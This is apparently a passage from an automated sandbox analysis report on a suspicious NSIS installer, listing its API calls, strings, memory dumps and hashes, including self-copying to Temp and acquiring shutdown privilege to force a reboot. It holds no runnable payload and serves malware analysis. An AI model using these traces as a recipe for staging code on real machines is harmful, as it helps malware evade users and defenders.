lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000,?), ref: 0040364C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
CopyFileW.KERNEL32(C:\Users\user\Desktop\Kb94RzMYNf.exe,0042AA08,00000001), ref: 004036D6
CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
OpenProcessToken.ADVAPI32(00000000), ref: 00403739
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
AdjustTokenPrivileges.ADVAPI32 ref: 00403771
ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
ExitProcess.KERNEL32 ref: 004037B9

Strings

Low, xrefs: 004034F4
SeShutdownPrivilege, xrefs: 00403748
TEMP, xrefs: 00403506
UXTHEME, xrefs: 004032E6, 004032EB, 004032F1
\Temp, xrefs: 004034D8
NSIS Error, xrefs: 0040333E
Janushoveds Setup, xrefs: 00403343
C:\Users\user\AppData\Local\neoimpressionism, xrefs: 004034A4, 004035C4, 0040366E, 00403678
Error launching installer, xrefs: 004035A9
C:\Users\user\AppData\Local\neoimpressionism, xrefs: 004035CF
C:\Users\user\Desktop, xrefs: 00403645, 0040364A, 00403677
C:\Users\user\AppData\Local\Temp\, xrefs: 004034B6, 004034BB, 004034D1, 004034DD, 004034EC, 004034F9, 00403505, 0040350D, 00403623, 00403634, 0040363F, 0040364B, 00403658, 00403667, 00403718
"C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 00403353, 00403359, 0040354F
.tmp, xrefs: 0040363A
1033, xrefs: 00403522
~nsu, xrefs: 0040361E
C:\Users\user\Desktop\Kb94RzMYNf.exe, xrefs: 004036D1
TMP, xrefs: 0040350E

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$C:\Users\user\AppData\Local\neoimpressionism$C:\Users\user\Desktop$C:\Users\user\Desktop\Kb94RzMYNf.exe$Error launching installer$Janushoveds Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-1479152066
Opcode ID: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
Opcode Fuzzy Hash: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E

Function 004052EE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040534C
GetDlgItem.USER32(?,000003EE), ref: 0040535B
GetClientRect.USER32(?,?), ref: 00405398
GetSystemMetrics.USER32(00000002), ref: 0040539F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
ShowWindow.USER32(?,00000008), ref: 0040543B
GetDlgItem.USER32(?,000003EC), ref: 0040545C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
GetDlgItem.USER32(?,000003F8), ref: 0040536A

Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157

GetDlgItem.USER32(?,000003EC), ref: 004054AE
CreateThread.KERNELBASE(00000000,00000000,Function_00005282,00000000), ref: 004054BC
CloseHandle.KERNELBASE(00000000), ref: 004054C3
ShowWindow.USER32(00000000), ref: 004054E7
ShowWindow.USER32(0001047C,00000008), ref: 004054EC
ShowWindow.USER32(00000008), ref: 00405536
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
CreatePopupMenu.USER32 ref: 0040557B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
GetWindowRect.USER32(?,?), ref: 004055AF
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
OpenClipboard.USER32(00000000), ref: 00405610
EmptyClipboard.USER32 ref: 00405616
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
GlobalLock.KERNEL32(00000000), ref: 0040562C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
GlobalUnlock.KERNEL32(00000000), ref: 00405660
SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
CloseClipboard.USER32 ref: 00405671

Strings

{, xrefs: 00405554

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
Opcode Fuzzy Hash: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68

Function 00406072 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406135
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004061B3
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061C6
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406210
CoTaskMemFree.OLE32(?), ref: 0040621B
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406299

Strings

Completed, xrefs: 00406097
: Completed, xrefs: 0040609C, 0040617C, 0040619D, 004061B2, 004061C5, 004061E1, 0040620C, 0040623E, 00406244, 0040625E, 00406272, 00406292, 00406298, 004062A4, 004062D7
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406239
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406181

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-905382516
Opcode ID: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
Opcode Fuzzy Hash: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D

Function 00405841 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058D5
lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
FindClose.KERNEL32(00000000), ref: 0040599A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
"C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 00405841
\*.*, xrefs: 004058AC

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-890868225
Opcode ID: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
Opcode Fuzzy Hash: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E

Function 00406393 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
FindClose.KERNEL32(00000000), ref: 004063AA

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
Opcode Fuzzy Hash: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29

Function 00403C3C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
ShowWindow.USER32(?), ref: 00403C95
DestroyWindow.USER32 ref: 00403CA9
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
GetDlgItem.USER32(?,?), ref: 00403CE6
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
IsWindowEnabled.USER32(00000000), ref: 00403D01
GetDlgItem.USER32(?,00000001), ref: 00403DAF
GetDlgItem.USER32(?,00000002), ref: 00403DB9
SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
GetDlgItem.USER32(?,00000003), ref: 00403ECA
ShowWindow.USER32(00000000,?), ref: 00403EEB
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
EnableWindow.USER32(?,?), ref: 00403F18
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
EnableMenuItem.USER32(00000000), ref: 00403F35
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
lstrlenW.KERNEL32(0042D248,?,0042D248,Janushoveds Setup), ref: 00403F89
SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
ShowWindow.USER32(?,0000000A), ref: 004040D1

Strings

Janushoveds Setup, xrefs: 00403F7A

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Janushoveds Setup
API String ID: 3282139019-1538351398
Opcode ID: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
Opcode Fuzzy Hash: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D

Function 00403899 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457

lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000), ref: 0040391A
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,774D3420), ref: 0040399A
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
GetFileAttributesW.KERNEL32(: Completed), ref: 004039B8
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\neoimpressionism), ref: 00403A01

Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4

RegisterClassW.USER32(00433E80), ref: 00403A3E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
ShowWindow.USER32(00000005,00000000), ref: 00403AC1
GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
RegisterClassW.USER32(00433E80), ref: 00403B03
DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22

Strings

: Completed, xrefs: 00403961, 0040396A, 00403978, 004039C7, 004039CD
RichEd20, xrefs: 00403AC7
Control Panel\Desktop\ResourceLocale, xrefs: 004038CD
RichEdit, xrefs: 00403AF4
C:\Users\user\AppData\Local\neoimpressionism, xrefs: 00403929, 00403931, 004039D4, 004039DA, 004039EA
.DEFAULT\Control Panel\International, xrefs: 00403905
_Nb, xrefs: 00403A1D, 00403A85
RichEdit20W, xrefs: 00403AE5, 00403AEB
RichEd32, xrefs: 00403AD5
.exe, xrefs: 004039A7
C:\Users\user\AppData\Local\Temp\, xrefs: 0040389E
"C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 0040389D
1033, xrefs: 004038B9, 00403915

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1693343726
Opcode ID: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
Opcode Fuzzy Hash: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D

Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Kb94RzMYNf.exe,00000400,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00402E1B

Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C29
Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C4B

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Kb94RzMYNf.exe,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00402E67

Strings

C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
soft, xrefs: 00402EDC
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
"C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 00402DEE
Null, xrefs: 00402EE5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
C:\Users\user\Desktop\Kb94RzMYNf.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
Inst, xrefs: 00402ED3
Error launching installer, xrefs: 00402E3E

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
